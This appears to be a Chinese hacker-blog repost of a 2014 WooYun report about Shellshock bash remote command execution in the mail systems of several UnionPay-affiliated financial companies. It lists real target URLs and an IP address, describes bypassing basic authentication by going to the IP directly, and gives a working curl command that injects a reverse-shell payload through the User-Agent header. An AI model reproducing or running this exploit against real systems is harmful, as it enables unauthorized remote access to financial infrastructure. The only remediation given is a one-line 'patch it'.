记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某金融系统3个邮件系统bash远程命令执行漏洞(绕过基础验证)

2014-11-12 02:30

银联商务:http://mail.chinaums.com/cgi-bin/madmin.cgi

https://gateway2.unionpay.com/cgi-bin/madmin.cgi

https://mail.unionpay.com/cgi-bin/madmin.cgi

银联在线:http://mail.chinapay.com/cgi-bin/madmin.cgi 银联在线这个存在基础认证 直接使用ip访问即可绕过(ip:218.80.244.37)



code 区域
curl  -A "() { :; }; /bin/bash -i > /dev/tcp/127.0.0.1/2345 0<&1 2>&1" http://218.80.244.37/cgi-bin/madmin.cgi -v



漏洞证明:

D7D657D6-F199-4E74-ABB0-7B9D0EFAF3F1.png



702BD97A-D37E-417F-87FA-AA7F287B22A2.png



D108F244-9803-410D-BCA1-A3E2B8C20C60.png

修复方案:

打补丁呗

知识来源: www.wooyun.org/bugs/wooyun-2014-077573

阅读:105730 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“某金融系统3个邮件系统bash远程命令执行漏洞(绕过基础验证)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词